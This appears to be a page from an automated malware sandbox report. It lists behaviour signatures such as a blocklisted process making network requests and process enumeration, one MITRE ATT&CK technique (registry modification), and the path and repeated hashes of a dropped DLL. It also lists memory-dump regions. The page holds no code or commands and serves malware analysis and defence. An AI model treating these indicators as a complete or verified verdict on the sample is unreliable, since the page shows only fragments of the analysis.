- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll
MD5
1b17ddb20a1593554449757b725d44a0

SHA1
2c0636a9eaec8f3046d353d7cce5fcbe1d98f239

SHA256
27c3e4bc2194534a3cdaec0659490b039ea31414acb324c937ac96e32de2ddba

SHA512
5d11ac5505b128f7b33d12b7ba223f89f511df019285877ac5b37823042bb61dc190134a82e39b4aff275068bff5eb9b0ef87f6d6a7e94f90147982098e4b7de

Download Submit
\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll
MD5
1b17ddb20a1593554449757b725d44a0

SHA1
2c0636a9eaec8f3046d353d7cce5fcbe1d98f239

SHA256
27c3e4bc2194534a3cdaec0659490b039ea31414acb324c937ac96e32de2ddba

SHA512
5d11ac5505b128f7b33d12b7ba223f89f511df019285877ac5b37823042bb61dc190134a82e39b4aff275068bff5eb9b0ef87f6d6a7e94f90147982098e4b7de

Download Submit
\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll
MD5
1b17ddb20a1593554449757b725d44a0

SHA1
2c0636a9eaec8f3046d353d7cce5fcbe1d98f239

SHA256
27c3e4bc2194534a3cdaec0659490b039ea31414acb324c937ac96e32de2ddba

SHA512
5d11ac5505b128f7b33d12b7ba223f89f511df019285877ac5b37823042bb61dc190134a82e39b4aff275068bff5eb9b0ef87f6d6a7e94f90147982098e4b7de

Download Submit
\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll
MD5
1b17ddb20a1593554449757b725d44a0

SHA1
2c0636a9eaec8f3046d353d7cce5fcbe1d98f239

SHA256
27c3e4bc2194534a3cdaec0659490b039ea31414acb324c937ac96e32de2ddba

SHA512
5d11ac5505b128f7b33d12b7ba223f89f511df019285877ac5b37823042bb61dc190134a82e39b4aff275068bff5eb9b0ef87f6d6a7e94f90147982098e4b7de

Download Submit
\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll
MD5
1b17ddb20a1593554449757b725d44a0

SHA1
2c0636a9eaec8f3046d353d7cce5fcbe1d98f239

SHA256
27c3e4bc2194534a3cdaec0659490b039ea31414acb324c937ac96e32de2ddba

SHA512
5d11ac5505b128f7b33d12b7ba223f89f511df019285877ac5b37823042bb61dc190134a82e39b4aff275068bff5eb9b0ef87f6d6a7e94f90147982098e4b7de

Download Submit
memory/556-21-0x000007FEF7570000-0x000007FEF77EA000-memory.dmp

Filesize
2.5MB

Download
memory/860-8-0x0000000001FB0000-0x0000000001FB1000-memory.dmp

Filesize
4KB

Download
memory/860-9-0x000000001C250000-0x000000001C251000-memory.dmp

Filesize
4KB

Download
memory/860-10-0x000000001C2E0000-0x000000001C2E1000-memory.dmp

Filesize
4KB

Download
memory/860-5-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/860-4-0x000007FEF50A0000-0x000007FEF5A8C000-memory.dmp

Filesize
9.9MB

Download
memory/860-7-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/860-3-0x0000000000000000-mapping.dmp

Download
memory/860-6-0x000000001AAB0000-0x000000001AAB1000-memory.dmp

Filesize
4KB

Download
memory/1568-2-0x0000000000000000-mapping.dmp

Download
memory/1584-18-0x00000000001C0000-0x00000000001E0000-memory.dmp

Filesize
128KB

Download
memory/1584-13-0x0000000000000000-mapping.dmp

Download
memory/1604-19-0x0000000000000000-mapping.dmp

Download
memory/1604-20-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/1660-11-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads